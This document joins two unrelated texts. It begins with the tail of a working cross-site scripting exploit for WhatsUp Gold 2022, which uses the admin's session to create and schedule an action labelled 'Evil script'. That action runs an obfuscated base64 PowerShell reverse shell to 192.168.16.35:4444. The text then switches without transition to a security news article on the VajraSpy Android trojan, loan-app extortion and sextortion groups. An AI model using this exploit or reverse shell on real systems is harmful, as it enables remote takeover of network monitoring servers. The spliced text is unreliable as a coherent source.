JAB0AG0AcAAgAD0AIABAACgAJwBzAFkAUwB0AGUATQAuAG4ARQB0AC4AcwBPAGMAJwAsACcASwBFAHQAcwAuAHQAQwBQAEMAbABJAGUAbgB0ACcAKQA7ACQAdABtAHAAMgAgAD0AIABbAFMAdAByAGkAbgBnAF0AOgA6AEoAbwBpAG4AKAAnACcALAAkAHQAbQBwACkAOwAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAkAHQAbQBwADIAKAAnADEAOQAyAC4AMQA2ADgALgAxADYALgAzADUAJwAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQApACAAKwAgACcAQAAnACAAKwAgACgAJABlAG4AdgA6AFUAcwBlAHIARABvAG0AYQBpAG4AKQAgACsAIAAoAFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATgBlAHcATABpAG4AZQApACAAKwAgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AKQArACcAPgAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==\\" -NoNewWindow","ScriptImpersonateFlag":false,"ClsId":"5903a09a-cce6-11e0-8f66-fe544824019b","Description":"Evil script","Name":"Systemtask"}'});setTimeout(() => { getactions(); }, 1000);};async function getactions() {const response = await fetch(vhost+'/NmConsole/api/core/WugAction?_dc=4',{    method: 'GET',    headers: {        'Connection': 'close',         'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',         'Accept': 'application/json',         'Content-Type': 'application/json',         'X-Requested-With': 'XMLHttpRequest',         'sec-ch-ua-mobile': '?0',         'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',         'sec-ch-ua-platform': '"macOS"',         'Sec-Fetch-Site': 'same-origin',         'Sec-Fetch-Mode': 'cors',         'Sec-Fetch-Dest': 'empty',         'Accept-Encoding': 'gzip, deflate',         'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'    },    credentials: 'include'   });const actions = await response.json();var results = [];var searchField = "Name";var searchVal = "Systemtask";for (var i=0 ; i < actions.length ; i++){    if (actions[i][searchField] == searchVal) {        results.push(actions[i].Id);        revshell(results[0])           }}//console.log(actions);};async function revshell(ID) {fetch(vhost+'/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',{    method: 'POST',    headers: {        'Connection': 'close',        'Content-Length': '2442',        'Cache-Control': 'max-age=0',        'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="102", "Microsoft Edge";v="102"',        'sec-ch-ua-mobile': '?0',        'sec-ch-ua-platform': '"macOS"',        'Upgrade-Insecure-Requests': '1',        'Origin': 'https://192.168.16.100',        'Content-Type': 'application/x-www-form-urlencoded',        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33',        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',        'Sec-Fetch-Site': 'same-origin',        'Sec-Fetch-Mode': 'navigate',        'Sec-Fetch-User': '?1',        'Sec-Fetch-Dest': 'iframe',        'Referer': 'https://192.168.16.100/NmConsole/Configuration/DlgRecurringActionLibrary/DlgSchedule/DlgSchedule.asp',        'Accept-Encoding': 'gzip, deflate',        'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4'    },    credentials: 'include',    body: 'DlgSchedule.oCheckBoxEnableSchedule=on&DlgSchedule.ScheduleType=DlgSchedule.oRadioButtonInterval&DlgSchedule.oEditIntervalMinutes=5&ShowAspFormDialog.VISITEDFORM=visited&DlgRecurringActionGeneral.oEditName=test&DlgRecurringActionGeneral.oComboSelectActionType=21&DlgRecurringActionGeneral.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgRecurringActionGeneral.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&DlgRecurringActionGeneral.VISITEDFORM=visited%2C+visited&DlgSchedule.DIALOGRETURNURL=%2FNmConsole%2F%24Nm%2FCore%2FForm-AspForms%2Finc%2FShowAspFormDialog.asp&DlgSchedule.SAVEDFORMSTATE=%253cSavedFormState%253e%253cFormVariables%253e%253coElement%2520sName%3D%2522__VIEWSTATE%2522%2520sValue%3D%2522%25253cViewState%2F%25253e%0D%0A%2522%2F%253e%253c%2FFormVariables%253e%253cQueryStringVariables%2F%253e%253c%2FSavedFormState%253e&__EVENTTYPE=ButtonPressed&__EVENTTARGET=DlgSchedule.oButtonFinish&__EVENTARGUMENT=&DlgSchedule.VISITEDFORM=visited&__SOURCEFORM=DlgSchedule&__VIEWSTATE=%253cViewState%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-nActionTypeID%2522%2520sValue%3D%2522'+ID+'%2522%2F%253e%253coElement%2520sName%3D%2522Date_nStartOfWeek%2522%2520sValue%3D%25220%2522%2F%253e%253coElement%2520sName%3D%2522Date_sMediumDateFormat%2522%2520sValue%3D%2522MMMM%2520dd%2C%2520yyyy%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgRecurringActionGeneral.sWebUserName%2522%2520sValue%3D%2522admin%2522%2F%253e%253coElement%2520sName%3D%2522DlgSchedule.RecurringAction-sMode%2522%2520sValue%3D%2522new%2522%2F%253e%253coElement%2520sName%3D%2522RecurringAction-sName%2522%2520sValue%3D%2522test%2522%2F%253e%253coElement%2520sName%3D%2522Date_bIs24HourTime%2522%2520sValue%3D%25220%2522%2F%253e%253c%2FViewState%253e%0D%0A&DlgSchedule.oEditDay=&DlgSchedule.oComboSelectMonthHour=0&DlgSchedule.oComboSelectMonthMinute=0&DlgSchedule.oComboSelectMonthAmPm=0&DlgSchedule.oComboSelectWeekHour=0&DlgSchedule.oComboSelectWeekMinute=0&DlgSchedule.oComboSelectWeekAmPm=0'});};

WhatsUp Gold 2022 22.1.0 Build 39 Cross Site Scripting

The threat actor known as Patchwork likely used romance scam lures to trap victims in Pakistan and India, and infect their Android devices with a remote access trojan called VajraSpy.
Slovak cybersecurity firm ESET said it uncovered 12 espionage apps, six of which were available for download from the official Google Play Store and were collectively downloaded more than 1,400 times between

The threat actor known as Patchwork likely used romance scam lures to trap victims in Pakistan and India, and infect their Android devices with a remote access trojan called **VajraSpy**.

Slovak cybersecurity firm ESET said it uncovered 12 espionage apps, six of which were available for download from the official Google Play Store and were collectively downloaded more than 1,400 times between April 2021 and March 2023.

"VajraSpy has a range of espionage functionalities that can be expanded based on the permissions granted to the app bundled with its code," security researcher Lukáš Štefanko said. "It steals contacts, files, call logs, and SMS messages, but some of its implementations can even extract WhatsApp and Signal messages, record phone calls, and take pictures with the camera."

As many as 148 devices in Pakistan and India are estimated to have been compromised in the wild. The malicious apps distributed via Google Play and elsewhere primarily masqueraded as messaging applications, with the most recent ones propagated as recently as September 2023.

*   Privee Talk (com.priv.talk)
*   MeetMe (com.meeete.org)
*   Let's Chat (com.letsm.chat)
*   Quick Chat (com.qqc.chat)
*   Rafaqat رفاق (com.rafaqat.news)
*   Chit Chat (com.chit.chat)
*   YohooTalk (com.yoho.talk)
*   TikTalk (com.tik.talk)
*   Hello Chat (com.hello.chat)
*   Nidus (com.nidus.no or com.nionio.org)
*   GlowChat (com.glow.glow)
*   Wave Chat (com.wave.chat)

Rafaqat رفاق is notable for the fact that it's the only non-messaging app and was advertised as a way to access the latest news. It was uploaded to Google Play on October 26, 2022, by a developer named Mohammad Rizwan and amassed a total of 1,000 downloads before it was taken down by Google.

The exact distribution vector for the malware is currently not clear, although the nature of the apps suggests that the targets were tricked into downloading them as part of a honey-trap romance scam, where the perpetrators convince them to install these bogus apps under the pretext of having a more secure conversation.

This is not the first time Patchwork – a threat actor with suspected ties to India – has leveraged this technique. In March 2023, Meta revealed that the hacking crew created fictitious personas on Facebook and Instagram to share links to rogue apps to target victims in Pakistan, India, Bangladesh, Sri Lanka, Tibet, and China.

It's also not the first time that the attackers have been observed deploying VajraRAT, which was previously documented by Chinese cybersecurity company QiAnXin in early 2022 as having been used in a campaign aimed at Pakistani government and military entities. Vajra gets its name from the Sanskrit word for thunderbolt.

Qihoo 360, in its own analysis of the malware in November 2023, tied it to a threat actor it tracks under the moniker Fire Demon Snake (aka APT-C-52).

Outside of Pakistan and India, Nepalese government entities have also been likely targeted via a phishing campaign that delivers a Nim-based backdoor. It has been attributed to the SideWinder group, another group that has been flagged as operating with Indian interests in mind.

The development comes as financially motivated threat actors from Pakistan and India have been found targeting Indian Android users with a fake loan app (Moneyfine or "com.moneyfine.fine") as part of an extortion scam that manipulates the selfie uploaded as part of a know your customer (KYC) process to create a nude image and threatens victims to make a payment or risk getting the doctored photos distributed to their contacts.

"These unknown, financially motivated threat actors make enticing promises of quick loans with minimal formalities, deliver malware to compromise their devices, and employ threats to extort money," Cyfirma said in an analysis late last month.

It also comes amid a broader trend of people falling prey to predatory loan apps, which are known to harvest sensitive information from infected devices, and employ blackmail and harassment tactics to pressure victims into making the payments.

According to a recent report published by the Network Contagion Research Institute (NCRI), teenagers from Australia, Canada, and the U.S. are increasingly targeted by financial sextortion attacks conducted by Nigeria-based cybercriminal group known as Yahoo Boys.

"Nearly all of this activity is linked to West African cybercriminals known as the Yahoo Boys, who are primarily targeting English-speaking minors and young adults on Instagram, Snapchat, and Wizz," NCRI said.

Wizz, which has since had its Android and iOS apps taken down from the Apple App Store and the Google Play Store, countered the NCRI report, stating it's "not aware of any successful extortion attempts that occurred while communicating on the Wizz app."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#apple